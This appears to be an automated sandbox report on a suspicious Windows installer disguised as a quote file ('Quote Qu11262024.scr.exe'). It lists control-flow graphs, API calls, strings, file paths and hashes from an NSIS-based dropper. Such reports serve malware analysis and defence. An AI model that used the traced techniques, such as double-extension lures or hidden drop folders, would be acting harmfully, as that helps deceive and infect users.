4032ca ReadFile 5221->5222 5223 4027a7 GlobalAlloc 5222->5223 5224 4027f1 5223->5224 5225 4027b7 5223->5225 5226 405d14 WriteFile 5224->5226 5227 403059 40 API calls 5225->5227 5228 4027fd GlobalFree 5226->5228 5232 4027c4 5227->5232 5229 403059 40 API calls 5228->5229 5231 402810 5229->5231 5230 4027e8 GlobalFree 5230->5224 5231->5216 5232->5230 5233->5213 5234->5221 5235 4045be 5236 4045f4 5235->5236 5237 4045ce 5235->5237 5239 4041da 8 API calls 5236->5239 5238 404173 18 API calls 5237->5238 5241 4045db SetDlgItemTextA 5238->5241 5240 404600 5239->5240 5241->5236 5242 401b3f 5243 402acb 17 API calls 5242->5243 5244 401b46 5243->5244 5245 402aa9 17 API calls 5244->5245 5246 401b4f wsprintfA 5245->5246 5247 402957 5246->5247

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 403328-403367 SetErrorMode GetVersion 1 403369-403371 call 40646c 0->1 2 40337a 0->2 1->2 7 403373 1->7 4 40337f-403392 call 4063fe lstrlenA 2->4 9 403394-4033b0 call 40646c * 3 4->9 7->2 16 4033c1-40341f #17 OleInitialize SHGetFileInfoA call 4060d4 GetCommandLineA call 4060d4 9->16 17 4033b2-4033b8 9->17 24 403421-403426 16->24 25 40342b-403440 call 405a97 CharNextA 16->25 17->16 21 4033ba 17->21 21->16 24->25 28 403505-403509 25->28 29 403445-403448 28->29 30 40350f 28->30 31 403450-403458 29->31 32 40344a-40344e 29->32 33 403522-40353c GetTempPathA call 4032f7 30->33 34 403460-403463 31->34 35 40345a-40345b 31->35 32->31 32->32 42 403594-4035ae DeleteFileA call 402db3 33->42 43 40353e-40355c GetWindowsDirectoryA lstrcatA call 4032f7 33->43 37 4034f5-403502 call 405a97 34->37 38 403469-40346d 34->38 35->34 37->28 53 403504 37->53 40 403485-4034b2 38->40 41 40346f-403475 38->41 47 4034b4-4034ba 40->47 48 4034c5-4034f3 40->48 45 403477-403479 41->45 46 40347b 41->46 58 403642-403652 call 403810 OleUninitialize 42->58 59 4035b4-4035ba 42->59 43->42 61 40355e-40358e GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4032f7 43->61 45->40 45->46 46->40 54 4034c0 47->54 55 4034bc-4034be 47->55 48->37 57 403511-40351d call 4060d4 48->57 53->28 54->48 55->48 55->54 57->33 72 403776-40377c 58->72 73 403658-403668 call 4057f0 ExitProcess 58->73 62 403632-403639 call 403902 59->62 63 4035bc-4035c7 call 405a97 59->63 61->42 61->58 70 40363e 62->70 74 4035c9-4035f2 63->74 75 4035fd-403607 63->75 70->58 77 4037f8-403800 72->77 78 40377e-403797 GetCurrentProcess OpenProcessToken 72->78 79 4035f4-4035f6 74->79 82 403609-403616 call 405b5a 75->82 83 40366e-403682 call 40575b lstrcatA 75->83 80 403802 77->80 81 403806-40380a ExitProcess 77->81 85 4037c9-4037d7 call 40646c 78->85 86 403799-4037c3 LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 87 4035f8-4035fb 79->87 80->81 82->58 96 403618-40362e call 4060d4 * 2 82->96 97 403684-40368a lstrcatA 83->97 98 40368f-4036a9 lstrcatA lstrcmpiA 83->98 94 4037e5-4037ef ExitWindowsEx 85->94 95 4037d9-4037e3 85->95 86->85 87->75 87->79 94->77 99 4037f1-4037f3 call 40140b 94->99 95->94 95->99 96->62 97->98 98->58 101 4036ab-4036ae 98->101 99->77 102 4036b0-4036b5 call 4056c1 101->102 103 4036b7 call 40573e 101->103 112 4036bc-4036c9 SetCurrentDirectoryA 102->112 103->112 113 4036d6-4036fe call 4060d4 112->113 114 4036cb-4036d1 call 4060d4 112->114 118 403704-403720 call 4060f6 DeleteFileA 113->118 114->113 121 403761-403768 118->121 122 403722-403732 CopyFileA 118->122 121->118 123 40376a-403771 call 405eb3 121->123 122->121 124 403734-403754 call 405eb3 call 4060f6 call 405773 122->124 123->58 124->121 133 403756-40375d CloseHandle 124->133 133->121
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNELBASE ref: 0040334D
                                                                                                    • GetVersion.KERNEL32 ref: 00403353
                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403386
                                                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033C2
                                                                                                    • OleInitialize.OLE32(00000000), ref: 004033C9
                                                                                                    • SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004033E5
                                                                                                    • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004033FA
                                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Quote Qu11262024.scr.exe",00000020,"C:\Users\user\Desktop\Quote Qu11262024.scr.exe",00000000,?,00000006,00000008,0000000A), ref: 00403436
                                                                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403533
                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403544
                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403550
                                                                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403564
                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040356C
                                                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040357D
                                                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403585
                                                                                                    • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403599
                                                                                                      • Part of subcall function 0040646C: GetModuleHandleA.KERNEL32(?,?,?,0040339B,0000000A), ref: 0040647E
                                                                                                      • Part of subcall function 0040646C: GetProcAddress.KERNEL32(00000000,?), ref: 00406499
                                                                                                      • Part of subcall function 00403902: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes,1033,Softwoods Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Softwoods Setup: Installing,00000000,00000002,76233410), ref: 004039F2
                                                                                                      • Part of subcall function 00403902: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A05
                                                                                                      • Part of subcall function 00403902: GetFileAttributesA.KERNEL32(Call), ref: 00403A10
                                                                                                      • Part of subcall function 00403902: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes), ref: 00403A59
                                                                                                      • Part of subcall function 00403902: RegisterClassA.USER32(00423EC0), ref: 00403A96
                                                                                                      • Part of subcall function 00403810: CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,00403647,?,?,00000006,00000008,0000000A), ref: 00403822
                                                                                                      • Part of subcall function 00403810: CloseHandle.KERNEL32(000002D8,C:\Users\user\AppData\Local\Temp\,00403647,?,?,00000006,00000008,0000000A), ref: 00403836
                                                                                                    • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403647
                                                                                                    • ExitProcess.KERNEL32 ref: 00403668
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403785
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040378C
                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037A4
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037C3
                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004037E7
                                                                                                    • ExitProcess.KERNEL32 ref: 0040380A
                                                                                                      • Part of subcall function 004057F0: MessageBoxIndirectA.USER32(0040A230), ref: 0040584B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                    • String ID: "$"C:\Users\user\Desktop\Quote Qu11262024.scr.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pistoled\puddingstone\Flodsengenes\Opkaldtes$C:\Users\user\Desktop$C:\Users\user\Desktop\Quote Qu11262024.scr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                    • API String ID: 538718688-3405304089
                                                                                                    • Opcode ID: e6a1e8a4cc5e5790d2cb99f47d95a10e2d88d553a3a22a0b8a04b65cc4e2dce9
                                                                                                    • Instruction ID: f0ad904c17b6b0a615759e776a9b626e87a37abdf880564aefc6f329476caeff
                                                                                                    • Opcode Fuzzy Hash: e6a1e8a4cc5e5790d2cb99f47d95a10e2d88d553a3a22a0b8a04b65cc4e2dce9
                                                                                                    • Instruction Fuzzy Hash: 79C1F6702047506AD721AF759D99B2B3EA8EB81706F05443FF581B61E2CB7C8A158B2F

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 134 405339-405355 135 4054e4-4054ea 134->135 136 40535b-405422 GetDlgItem * 3 call 4041a8 call 404a99 GetClientRect GetSystemMetrics SendMessageA * 2 134->136 138 405514-405520 135->138 139 4054ec-40550e GetDlgItem CreateThread CloseHandle 135->139 158 405440-405443 136->158 159 405424-40543e SendMessageA * 2 136->159 141 405542-405548 138->141 142 405522-405528 138->142 139->138 146 40554a-405550 141->146 147 40559d-4055a0 141->147 144 405563-40556a call 4041da 142->144 145 40552a-40553d ShowWindow * 2 call 4041a8 142->145 155 40556f-405573 144->155 145->141 152 405552-40555e call 40414c 146->152 153 405576-405586 ShowWindow 146->153 147->144 150 4055a2-4055a8 147->150 150->144 160 4055aa-4055bd SendMessageA 150->160 152->144 156 405596-405598 call 40414c 153->156 157 405588-405591 call 4051fb 153->157 156->147 157->156 163 405453-40546a call 404173 158->163 164 405445-405451 SendMessageA 158->164 159->158 165 4055c3-4055ef CreatePopupMenu call 4060f6 AppendMenuA 160->165 166 4056ba-4056bc 160->166 171 4054a0-4054c1 GetDlgItem SendMessageA 163->171 172 40546c-405480 ShowWindow 163->172 164->163 173 4055f1-405601 GetWindowRect 165->173 174 405604-40561a TrackPopupMenu 165->174 166->155 171->166 178 4054c7-4054df SendMessageA * 2 171->178 175 405482-40548d ShowWindow 172->175 176 40548f 172->176 173->174 174->166 177 405620-40563a 174->177 179 405495-40549b call 4041a8 175->179 176->179 180 40563f-40565a SendMessageA 177->180 178->166 179->171 180->180 181 40565c-40567c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 180->181 183 40567e-40569e SendMessageA 181->183 183->183 184 4056a0-4056b4 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->166
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405398
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004053A7
                                                                                                    • GetClientRect.USER32(?,?), ref: 004053E4
                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004053EB
                                                                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040540C
                                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040541D
                                                                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405430
                                                                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040543E
                                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405451
                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405473
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405487
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054A8
                                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054B8
                                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054D1
                                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054DD
                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004053B6
                                                                                                      • Part of subcall function 004041A8: SendMessageA.USER32(00000028,?,00000001,00403FD8), ref: 004041B6
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054F9
                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000052CD,00000000), ref: 00405507
                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0040550E
                                                                                                    • ShowWindow.USER32(00000000), ref: 00405531
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405538
                                                                                                    • ShowWindow.USER32(00000008), ref: 0040557E
                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055B2
                                                                                                    • CreatePopupMenu.USER32 ref: 004055C3
                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055D8
                                                                                                    • GetWindowRect.USER32(?,000000FF), ref: 004055F8
                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405611
                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564D
                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040565D
                                                                                                    • EmptyClipboard.USER32 ref: 00405663
                                                                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 0040566C
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405676
                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040568A
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004056A3
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 004056AE
                                                                                                    • CloseClipboard.USER32 ref: 004056B4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                    • String ID: 0B
                                                                                                    • API String ID: 590372296-4132856435
                                                                                                    • Opcode ID: 86caed650feb3f9ca5d82a7f5b5b5fa98c80e9f13b96aec1ac8ca7826ca12a1c
                                                                                                    • Instruction ID: d18d2a4e752201d452310a28e4e69996c522da863cc3ae48ecc46783cc9b3639
                                                                                                    • Opcode Fuzzy Hash: 86caed650feb3f9ca5d82a7f5b5b5fa98c80e9f13b96aec1ac8ca7826ca12a1c
                                                                                                    • Instruction Fuzzy Hash: 47A15B71900608BFDB119FA0DE89EAE7F79FB44355F00403AFA05BA1A0CB794E519F58

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 497 40589c-4058c2 call 405b5a 500 4058c4-4058d6 DeleteFileA 497->500 501 4058db-4058e2 497->501 502 405a65-405a69 500->502 503 4058e4-4058e6 501->503 504 4058f5-405905 call 4060d4 501->504 505 405a13-405a18 503->505 506 4058ec-4058ef 503->506 512 405914-405915 call 405ab3 504->512 513 405907-405912 lstrcatA 504->513 505->502 509 405a1a-405a1d 505->509 506->504 506->505 510 405a27-405a2f call 4063d7 509->510 511 405a1f-405a25 509->511 510->502 520 405a31-405a45 call 405a6c call 405854 510->520 511->502 515 40591a-40591d 512->515 513->515 518 405928-40592e lstrcatA 515->518 519 40591f-405926 515->519 521 405933-405951 lstrlenA FindFirstFileA 518->521 519->518 519->521 536 405a47-405a4a 520->536 537 405a5d-405a60 call 4051fb 520->537 523 405957-40596e call 405a97 521->523 524 405a09-405a0d 521->524 530 405970-405974 523->530 531 405979-40597c 523->531 524->505 526 405a0f 524->526 526->505 530->531 533 405976 530->533 534 40597e-405983 531->534 535 40598f-40599d call 4060d4 531->535 533->531 539 405985-405987 534->539 540 4059e8-4059fa FindNextFileA 534->540 547 4059b4-4059bf call 405854 535->547 548 40599f-4059a7 535->548 536->511 542 405a4c-405a5b call 4051fb call 405eb3 536->542 537->502 539->535 543 405989-40598d 539->543 540->523 545 405a00-405a03 FindClose 540->545 542->502 543->535 543->540 545->524 556 4059e0-4059e3 call 4051fb 547->556 557 4059c1-4059c4 547->557 548->540 550 4059a9-4059b2 call 40589c 548->550 550->540 556->540 559 4059c6-4059d6 call 4051fb call 405eb3 557->559 560 4059d8-4059de 557->560 559->540 560->540
                                                                                                    APIs
                                                                                                    • DeleteFileA.KERNELBASE(?,?,76233410,76232EE0,00000000), ref: 004058C5
                                                                                                    • lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,76233410,76232EE0,00000000), ref: 0040590D
                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,76233410,76232EE0,00000000), ref: 0040592E
                                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,76233410,76232EE0,00000000), ref: 00405934
                                                                                                    • FindFirstFileA.KERNEL32(00421D38,?,?,?,0040A014,?,00421D38,?,?,76233410,76232EE0,00000000), ref: 00405945
                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059F2
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405A03
                                                                                                    Strings
                                                                                                    • \*.*, xrefs: 00405907
                                                                                                    • "C:\Users\user\Desktop\Quote Qu11262024.scr.exe", xrefs: 0040589C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                    • String ID: "C:\Users\user\Desktop\Quote Qu11262024.scr.exe"$\*.*
                                                                                                    • API String ID: 2035342205-1532825241
                                                                                                    • Opcode ID: 5ef906299c16aefd2a1dd77cbd0aa991f291a3eb688e5f45fed9bd969e5efd66
                                                                                                    • Instruction ID: a6b31b96a3193368f0c726ff4b29e15ec2653ad771cccf2a3f4b6633d6870341
                                                                                                    • Opcode Fuzzy Hash: 5ef906299c16aefd2a1dd77cbd0aa991f291a3eb688e5f45fed9bd969e5efd66
                                                                                                    • Instruction Fuzzy Hash: B651B171940A14AADB21AB61CC85BBF7A78DF46724F14823BF441B51D2C73C4A82DF69
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNELBASE(76233410,00422580,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,00405B9D,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,76233410,?,76232EE0,004058BC,?,76233410,76232EE0), ref: 004063E2
                                                                                                    • FindClose.KERNEL32(00000000), ref: 004063EE
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\nsh4D29.tmp, xrefs: 004063D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp
                                                                                                    • API String ID: 2295610775-4005109940
                                                                                                    • Opcode ID: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
                                                                                                    • Instruction ID: dd9ea6853b51e4f368af76f9138fc8587e3728c5680d4f1d73d553fd61e6fd36
                                                                                                    • Opcode Fuzzy Hash: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
                                                                                                    • Instruction Fuzzy Hash: 7AD01231505120ABC20017386E0C84B7A68DF15331B118B3BF8AAF11E0DB748CA296DD

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 185 403c9f-403cb1 186 403df2-403e01 185->186 187 403cb7-403cbd 185->187 189 403e50-403e65 186->189 190 403e03-403e4b GetDlgItem * 2 call 404173 SetClassLongA call 40140b 186->190 187->186 188 403cc3-403ccc 187->188 191 403ce1-403ce4 188->191 192 403cce-403cdb SetWindowPos 188->192 194 403ea5-403eaa call 4041bf 189->194 195 403e67-403e6a 189->195 190->189 197 403ce6-403cf8 ShowWindow 191->197 198 403cfe-403d04 191->198 192->191 204 403eaf-403eca 194->204 200 403e6c-403e77 call 401389 195->200 201 403e9d-403e9f 195->201 197->198 205 403d20-403d23 198->205 206 403d06-403d1b DestroyWindow 198->206 200->201 216 403e79-403e98 SendMessageA 200->216 201->194 203 404140 201->203 211 404142-404149 203->211 209 403ed3-403ed9 204->209 210 403ecc-403ece call 40140b 204->210 214 403d25-403d31 SetWindowLongA 205->214 215 403d36-403d3c 205->215 212 40411d-404123 206->212 219 4040fe-404117 DestroyWindow EndDialog 209->219 220 403edf-403eea 209->220 210->209 212->203 218 404125-40412b 212->218 214->211 221 403d42-403d53 GetDlgItem 215->221 222 403ddf-403ded call 4041da 215->222 216->211 218->203 226 40412d-404136 ShowWindow 218->226 219->212 220->219 227 403ef0-403f3d call 4060f6 call 404173 * 3 GetDlgItem 220->227 223 403d72-403d75 221->223 224 403d55-403d6c SendMessageA IsWindowEnabled 221->224 222->211 228 403d77-403d78 223->228 229 403d7a-403d7d 223->229 224->203 224->223 226->203 255 403f47-403f83 ShowWindow KiUserCallbackDispatcher call 404195 EnableWindow 227->255 256 403f3f-403f44 227->256 232 403da8-403dad call 40414c 228->232 233 403d8b-403d90 229->233 234 403d7f-403d85 229->234 232->222 236 403dc6-403dd9 SendMessageA 233->236 238 403d92-403d98 233->238 234->236 237 403d87-403d89 234->237 236->222 237->232 241 403d9a-403da0 call 40140b 238->241 242 403daf-403db8 call 40140b 238->242 253 403da6 241->253 242->222 251 403dba-403dc4 242->251 251->253 253->232 259 403f85-403f86 255->259 260 403f88 255->260 256->255 261 403f8a-403fb8 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403fba-403fcb SendMessageA 261->262 263 403fcd 261->263 264 403fd3-40400d call 4041a8 call 403c80 call 4060d4 lstrlenA call 4060f6 SetWindowTextA call 401389 262->264 263->264 264->204 275 404013-404015 264->275 275->204 276 40401b-40401f 275->276 277 404021-404027 276->277 278 40403e-404052 DestroyWindow 276->278 277->203 279 40402d-404033 277->279 278->212 280 404058-404085 CreateDialogParamA 278->280 279->204 281 404039 279->281 280->212 282 40408b-4040e2 call 404173 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->203 282->203 287 4040e4-4040f7 ShowWindow call 4041bf 282->287 289 4040fc 287->289 289->212
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CDB
                                                                                                    • ShowWindow.USER32(?), ref: 00403CF8
                                                                                                    • DestroyWindow.USER32 ref: 00403D0C
                                                                                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D28
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403D49
                                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D5D
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D64
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403E12
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403E1C
                                                                                                    • SetClassLongA.USER32(?,000000F2,?), ref: 00403E36
                                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E87
                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403F2D
                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403F4E
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F60
                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F7B
                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F91
                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403F98
                                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB0
                                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FC3
                                                                                                    • lstrlenA.KERNEL32(Softwoods Setup: Installing,?,Softwoods Setup: Installing,00000000), ref: 00403FED
                                                                                                    • SetWindowTextA.USER32(?,Softwoods Setup: Installing), ref: 00403FFC
                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404130
                                                                                                    Strings
